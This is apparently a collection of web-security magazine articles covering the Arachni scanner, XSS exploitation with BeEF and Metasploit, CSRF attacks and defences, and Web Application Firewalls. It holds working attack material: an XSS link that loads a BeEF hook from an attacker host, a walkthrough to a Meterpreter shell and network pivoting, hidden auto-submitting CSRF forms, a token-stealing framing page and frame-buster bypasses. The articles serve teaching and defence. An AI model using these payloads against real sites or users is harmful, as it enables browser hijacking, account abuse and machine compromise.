- Highly extensible: create your own modules, plug-ins and even reports with ease.
- User-friendly: start your scan in minutes.
- Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
- Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

- No AJAX and JSON support
- No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing. Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker. And, why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit!

HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).


WEB APP VULNERABILITIES

XSS Beef Metasploit Exploitation


Cross Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.

In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a pop-up initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine. In this article, we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeeF (a browser exploitation framework).

A Simple POC

To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this also.

HTML Page
<HTML>
<BODY>
<FORM NAME=test action=search1.php method=GET>
Search: <INPUT TYPE=text name=search></INPUT>
<INPUT TYPE=submit name=Submit value=Submit></INPUT>
</FORM>
</BODY>
</HTML>


Figure 1. User enters in a search box

Figure 2. BeeF after conguration


Figure 3. Connection with BeeF controller

Figure 5. What victim will see

Server Side PHP Code


<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>

As you can see, it's some very simple code where the user enters something in a search box on the first page; his input is sent to the server, which reads the value of the parameter and prints it on the screen. So, instead of a simple text input, the attacker enters a simple piece of JavaScript into the box; the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link such as http://localhost/search1.php?search=<script>alert(document.domain)</script>. The screenshot below clarifies the above steps (Figure 1).


Beef Hook the user's browser

Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the user's browser and machine. I used an older version of BeeF (0.3.2) as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeeF from the tarball, copy it into your web server directory and click a few buttons to configure it. Alternatively you could use a distribution like Backtrack which already has BeeF installed. Here is a screenshot of how BeeF looks after it is configured (Figure 2). Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking a link which tells his browser to connect to the BeeF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src=http://192.168.56.101/beef/hook/beefmagic.js.php></script>&Submit=Submit

The IP address here is the one on which you have BeeF running. Once the user clicks on the link above, you should see an entry in the BeeF controller window showing that a Zombie has connected. You can see this in the Log section on the right hand side or the Zombie section on the left hand side. Here is a screenshot which shows that a browser has connected to the BeeF controller (Figure 3). Click and highlight the zombie in the left pane and then click on Standard Modules > Alert Dialog. This will result in a little popup box popping up on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5). So as you can see, because of BeeF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data.

Figure 4. What attacker will see

Figure 6. Defacing the current Web Page


Figure 7. Detecting plugins on the user browser

Hence, it becomes all the more important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS. I'll quickly discuss a few more examples using BeeF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.

Figure 9. Jobs command

Defacing the Current Web Page

Figure 10. Metasploit after clicking Send Now

This results in the webpage being rewritten on the victim browser with the text in the DEFACE STRING box. Try it out! (Figure 6)

Detect all Plugins on the User's Browser

There are plenty of other plug-ins inside BeeF under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here as the principle is the same. What I want to do now though is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate Beef with Metasploit and get a shell

Figure 11. Meterpreter window - screenshot 1

Edit BeeF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php to set the correct IP address. Once this is done you can launch Metasploit's browser-based exploits from inside BeeF.

Figure 8. Starting Metasploit

Figure 12. Meterpreter window - screenshot 2


References

- http://www.technicalinfo.net/papers/CSS.html
- https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
- https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
- http://beefproject.com/

Figure 13. Meterpreter window - screenshot 3

Now first ensure that the Zombie is still connected. Then click on Standard Modules > Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8). Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeeF can talk to Metasploit by running the jobs command (Figure 9). If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10). Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory so I won't say much (Figure 11-13). The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine. Once we have control over this machine we can use FTP or HTTP to download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.

Mitigation

To mitigate XSS one must do the following:

- Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
- All such output, as in a), must be encoded before displaying it to the user; the OWASP XSS Prevention Cheat Sheet is a good guide for the same (see the sketch after this list).
- White list and black list filtering can also be used to completely disallow specific characters in user input fields.
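As a hedged illustration of the encoding step, here is a Ruby sketch mirroring the PHP search page from earlier; the helper name is made up:

require 'cgi'

# Encode user-controlled data before it is reflected into HTML.
def render_search_result(user_input)
  "The parameter passed is #{CGI.escapeHTML(user_input)}"
end

puts render_search_result('<script>alert(document.domain)</script>')
# => The parameter passed is &lt;script&gt;alert(document.domain)&lt;/script&gt;

With the output encoded, the payload that hooked the browser earlier is rendered as inert text instead of being executed.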

Conclusion

In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of a user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.

ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration testing. In addition, he freelances in information security audits, training and product development (Perl, Ruby on Rails), while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvind.doraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings: http://resources.infosecinstitute.com/author/arvind/ and http://ardsec.blogspot.com




WEB APP VULNERABILITIES

Cross-site Request Forgery


IN-DEPTH ANALYSIS CYBER GATES 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.

In simple words: it is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics

A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src=http://twitter.com/home?status=evil.com style=display:none/>

Useless Defenses

The following are the weak defenses:

Only accept POST

Many web developers use POST instead of GET requests to avoid this kind of a malicious attack. This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc., so this approach is useless, as shown by the HTML code in Listing 1 used to bypass that kind of a protection.

Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php" method="POST" target="hiddenFrame">
<input name="message" type="text" value="I like www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit();</script>
</div>

Referrer checking

Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.

Requiring multi-step transactions

CSRF attacks can perform each step in order.

Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time a form is submitted might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in

a webpage form's hidden field and in a session at the same time, to compare them after the form submission. Subverting one-time tokens is usually accomplished by brute force attacks, and brute forcing attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>

Defense Using One-time Tokens

To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token, index.php on the victim website (Listing 2), and at the webpage which processes the request and stores the message only if the given token is correct, post.php on the victim website (Listing 3).
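As an aside, a Ruby sketch of the same token generation might look as follows; the session hash stands in for a framework's session store, and note that SecureRandom is a stronger source of randomness than md5(uniqid(rand())):

require 'securerandom'

session = {}                     # stand-in for the framework's session store

token = SecureRandom.hex(16)     # 32 unpredictable hex characters
session[:token] = token

puts token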
Listing 2. index.php (Victim website)

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="hidden" name="token" value="<?php echo $token?>">
<input type="submit" value="Post">
</form>
</body>
</html>
Listing 3. post.php (Victim website)

<?php
session_start();
if( $_SESSION['token'] == $_POST['token'] ){
    $message = $_POST['message'];
    echo "<b>Message:</b><br/>".$message;
    $file = fopen('messages.txt','a');
    fwrite($file,$message."\r\n");
    fclose($file);
} else {
    echo 'Bad request.';
}
?>

In-depth Analysis

In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. Listing 4, index.php on the evil website, shows a real scenario: the evil page frames good.com/index.php and tries to read the token with

var token = window.frames[0].document.forms["messageForm"].token.value;

For security reasons, the same origin policy in browsers restricts browser-side programming languages, such as JavaScript, from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

Browser settings, however, are not hard to modify. So the best way for web application security is to secure the web application itself.

Frame Busting

The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type=text/javascript>
if(top != self) top.location.replace(location);
</script>

A FrameKiller consists of a conditional statement and a counter-action statement. Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))



And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = URL
document.write()
top.location.replace(URL)
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location

Different FrameKillers are used by web developers, and different techniques are used to bypass them:

Method 1

<script>
window.onbeforeunload = function(){
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>

Method 2

Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>

Best Practices

And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if( self == top ){
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>

This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.

Listing 4. Real scenario of the attack: index.php (Evil website)

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm(){
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm();">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>

References

- Cross-Site Request Forgery: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29; http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
- Same Origin Policy
- FrameKiller (Frame Busting): http://en.wikipedia.org/wiki/Framekiller; http://seclab.stanford.edu/websec/framebusting/framebust.pdf

SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has transformed his job to a higher level, and he is gradually becoming a more complete security professional.


WEB APPLICATION CHECKING

First the Security Gate, then the Airplane

What needs to be heeded when checking web applications?
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications, the backlash comes quickly because many are accessible for everyone worldwide.

They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks. In most commercial and non-commercial areas the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet. A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as

an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of ever more powerful applications that provide the internet user with the required functions as quickly and simply as possible. Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end, this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently. Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby,

they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications. As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher. While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers. Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,

professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards; their security standard was based solely on how the individual developers rated this aspect and how deep their respective knowledge was. The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data. Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom provider's security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.

Figure 1. This model (based on Everett M. Rogers' adoption curve from Diffusion of Innovations) shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought



Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

- All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
- Cross Site Scripting (XSS)
- Hidden Field Tampering
- Parameter Tampering
- Cookie Poisoning
- Buffer Overflow
- Forceful Browsing
- Unauthorized access to web servers
- Search Engine Poisoning
- Social Engineering

A more recent trend: attackers increasingly combine these methods in order to achieve even higher success rates. And it is no longer just the large corporations that are targeted, since they usually guard and conceal their systems better. Instead, a growing number of smaller companies are now in the crossfire.

One Example

Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks to identify, with high efficiency, as many worthwhile targets on the web as possible. In this step they already gather the required data about the underlying software, operating system or database from web applications that give away such information freely. The attackers then only have to evaluate this information, which gives them an extensive basis for later targeted attacks.

How to Make a Web Application Secure

There are two ways of actually securing the data and processes connected to web applications. The first would be to program each application absolutely error-free, according to predefined guidelines, under the required application conditions and security aspects. Companies would then also have to bring older web applications up to the required standard after the fact.

However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but, above all, expensive. One example: a program that has so far not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious, it also harbors the danger of introducing new mistakes. Another example is programs that use more than just the session attributes for authentication. In such cases it is not straightforward to update the session ID after login, which makes the application susceptible to Session Fixation (a minimal sketch of the fix follows below).
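As a minimal sketch of the session fixation fix just mentioned: the session store and function names below are illustrative, not the API of any particular framework.

Listing 2. Issuing a fresh session ID after login

import secrets

sessions: dict[str, dict] = {}  # session_id -> session data (illustrative store)

def login(old_session_id: str, user: str) -> str:
    """Authenticate, then ALWAYS replace the pre-login session ID."""
    data = sessions.pop(old_session_id, {})  # discard the ID an attacker may know
    data["user"] = user
    new_session_id = secrets.token_hex(32)   # fresh, unpredictable replacement
    sessions[new_session_id] = data
    return new_session_id                    # send this as the new session cookie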
If existing web applications display weak spots and the probability of exploitation is relatively high, it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.

The situation is not much better with web applications developed from scratch. No software program has ever gone into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time, and by then correcting them is once again time-consuming and expensive. In addition, the application cannot simply be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less rework and the less complex the external security measures that have to be adopted.

The second approach, complementing secure programming, is the general safeguarding of web applications with a dedicated security system from the moment they go into operation. Such security systems are called Web Application Firewalls (WAF). A WAF protects web applications against attacks via the Hypertext Transfer Protocol (HTTP) and as such represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection Systems (IDS), a WAF checks the communication at the application level. Normally, the web application to be protected does not have to be changed.

Secure programming and WAFs are not contradictory; they complement each other. By analogy with air travel: it is without doubt important that the airplane (the application itself) is well serviced and safe, but even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably reduces the risk of attacks on any weak spots.

After introducing a WAF, it is still advisable to have the security functions checked, as penetration testers do. Such a check might reveal, for example, that the system can be abused via SQL Injection by entering inverted commas (single quotes). Correcting this error in the web application itself would be costly; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis, as this would lead to misjudging the achieved security status: filtering out special characters does not always prevent an attack based on the SQL Injection principle (a miniature version of this trade-off is sketched below). Additionally, system performance would suffer, because the security rules would have to be set as restrictively as possible in order to exclude all conceivable threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
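The following sketch contrasts the two remedies from the inverted-comma example: the quote filter mimics a hastily written WAF rule, while the parameterized query is the durable fix in the application itself. Table and column names are illustrative.

Listing 3. A naive quote filter versus a parameterized query

import sqlite3

def waf_style_quote_filter(value: str) -> str:
    # Mimics a WAF rule that simply strips single quotes from request data.
    # Insufficient on its own: an input like "1 OR 1=1" needs no quotes.
    return value.replace("'", "")

def find_user_safe(conn: sqlite3.Connection, username: str):
    # The application-side fix: the driver treats the bound value strictly
    # as data, never as SQL syntax.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()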

WAF Functionality

A major advantage of WAFs is that one single system can close the security loopholes of several web applications. Run in redundant mode, they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching they reduce the load on the backend web servers, and with automated compression they reduce the bandwidth requirements towards the client browser.

In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an input pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, simply by specifying general rules about parameter quality, such as maximum length, valid characters and permitted value range (a miniature example follows below).

An integrated XML firewall should also be standard these days, because more and more web applications are based on XML. It protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. Mature rate-limiting rules with finely adjustable policies also mitigate the consequences of Denial of Service or Brute Force attacks. Finally, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed on to the web application.
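A miniature version of such parameter rules might look as follows; the profile values are illustrative assumptions, not the defaults of any particular WAF product.

Listing 4. Checking parameter count, length and permitted characters

import re

# Illustrative profile for one monitored entry form.
PROFILE = {
    "username": {"max_len": 32, "pattern": re.compile(r"^[A-Za-z0-9_.-]+$")},
    "quantity": {"max_len": 4,  "pattern": re.compile(r"^[0-9]+$")},
}

def check_request(params: dict[str, str]) -> bool:
    """Accept a request only if it matches the defined parameter profile."""
    if set(params) != set(PROFILE):           # block extra or missing parameters
        return False
    for name, value in params.items():
        rule = PROFILE[name]
        if len(value) > rule["max_len"]:      # enforce maximum length
            return False
        if not rule["pattern"].match(value):  # enforce permitted characters
            return False
    return True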

Figure 2. An overview of how a Web Application Firewall works



Several WAFs offer the option of monitoring the data sent by the web server to the browser in such a way that they learn its nature. To a certain extent these filters can then automatically prevent malicious code from reaching the browser, for example when a web application does not sufficiently check the original data.

Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; such profiles quickly become outdated because of the constant tuning needed to maintain them. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. The ideal solution therefore relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications such as Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order entry page (a miniature version of this combination is sketched below).

To keep the number of false positives low, some manufacturers provide an exception profiler. It flags entries that technically violate the policies but, based on an extensive heuristic analysis, can still be categorized as legitimate, and presents them to the administrator. At the same time the exception profiler suggests exemption clauses that prevent a similar false positive from recurring.

Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. This configuration avoids changes to the existing network structure and can therefore be deployed very easily and quickly to protect an endangered web application, but it sacrifices security and application acceleration for network simplicity. It also means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted, and only a subset of the special functions is available.

The far safer operating mode for a WAF is the Full Reverse Proxy configuration, which sits in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. As a Full Reverse Proxy a WAF also provides, for example, Instant SSL, which converts HTTP pages to HTTPS without changes to the application code. Proxy WAFs offer a whole range of further security functions: they translate web addresses, rewriting the URLs used in public requests to the web application's hidden internal URLs, so that the application's actual address remains cloaked. With Proxy WAFs, SSL processing is much faster and the response times of the web application can be accelerated as well. They also provide cloaking techniques, Layer 7 rules (to fend off Denial of Service attacks), and authentication and authorization.
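In miniature, the combined whitelist/blacklist approach described above could be sketched like this; the paths and attack signatures are illustrative stand-ins for a learned profile and a templated signature set.

Listing 5. Combining a whitelist for high-value pages with a generic blacklist

import re

# Positive model: strictly validated high-value pages (e.g. order entry).
WHITELISTED_PATHS = {"/order/new", "/order/submit"}
ALLOWED_VALUE = re.compile(r"^[A-Za-z0-9 _.,-]{1,64}$")

# Negative model: crude signatures standing in for a templated profile.
BLACKLIST_SIGNATURES = [
    re.compile(r"<script", re.IGNORECASE),         # simplistic XSS indicator
    re.compile(r"union\s+select", re.IGNORECASE),  # simplistic SQLi indicator
]

def allow(path: str, params: dict[str, str]) -> bool:
    if path in WHITELISTED_PATHS:
        # Whitelist: only explicitly permitted input passes.
        return all(ALLOWED_VALUE.match(v) for v in params.values())
    # Blacklist: everything passes unless it matches a known attack pattern.
    return not any(
        sig.search(v) for v in params.values() for sig in BLACKLIST_SIGNATURES
    )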

Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult


Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the scan attacks mentioned earlier, with which attackers seek out easy prey. Masking outgoing data protects against data theft, and cookie security prevents identity theft (a toy masking filter is sketched below). The Proxy WAF must, however, be configured accordingly for each of these protections; here too, penetration tests help to establish the correct configuration.
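A toy version of such outbound cloaking and masking, assuming a filter that sees response headers and body on their way out; the PAN pattern is a deliberately crude stand-in for a real card-number detector.

Listing 6. Cloaking server details and masking card-like data in responses

import re

# Crude PAN-like pattern: 13-16 digits, optionally separated; a real detector
# would also validate the Luhn checksum.
PAN_PATTERN = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def mask_response(headers: dict[str, str], body: str):
    """Hide infrastructure details and redact card-number-like data."""
    headers.pop("Server", None)        # conceal web server product and version
    headers.pop("X-Powered-By", None)  # conceal the application platform
    body = PAN_PATTERN.sub("****MASKED****", body)
    return headers, body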

Demands on Penetration Testers

When penetration testers look for weak spots, they should also take the Payment Card Industry Data Security Standard (PCI DSS) 2.0 into account. It defines rules for transmitting and storing Primary Account Number (PAN) information, and it requires companies to develop secure web applications and to maintain them continuously. Further points define formal risk assessments and test processes intended to uncover high-risk weak spots. To check whether systems comply with PCI DSS, penetration testers should work through the following questions (a scripted spot check for two of them follows the list):

- Does the system have a Web Application Firewall?
- Does the web traffic pass through a WAF proxy function?
- Are the web servers shielded against direct access by attackers?
- Is there SSL encryption for the data traffic, even if the application or the server does not support it itself?
- Are all known and unknown threats blocked?
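Two of these questions lend themselves to a quick scripted spot check. The sketch below uses the third-party requests library; the addresses are placeholders, and such probes belong only in an authorized engagement.

Listing 7. Spot-checking direct origin access and HTTP-to-HTTPS redirection

import requests  # third-party: pip install requests

ORIGIN = "http://203.0.113.10"     # placeholder: backend server's direct address
PUBLIC = "http://www.example.com"  # placeholder: public address behind the WAF

# 1) Are the web servers shielded against direct access?
try:
    r = requests.get(ORIGIN, timeout=5)
    print(f"direct origin access: HTTP {r.status_code} - NOT shielded")
except requests.exceptions.RequestException:
    print("direct origin access: blocked - shielded as expected")

# 2) Is plain HTTP upgraded to HTTPS (e.g. via the WAF's Instant SSL)?
r = requests.get(PUBLIC, timeout=5, allow_redirects=False)
location = r.headers.get("Location", "")
print("HTTP-to-HTTPS redirect in place:", location.startswith("https://"))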

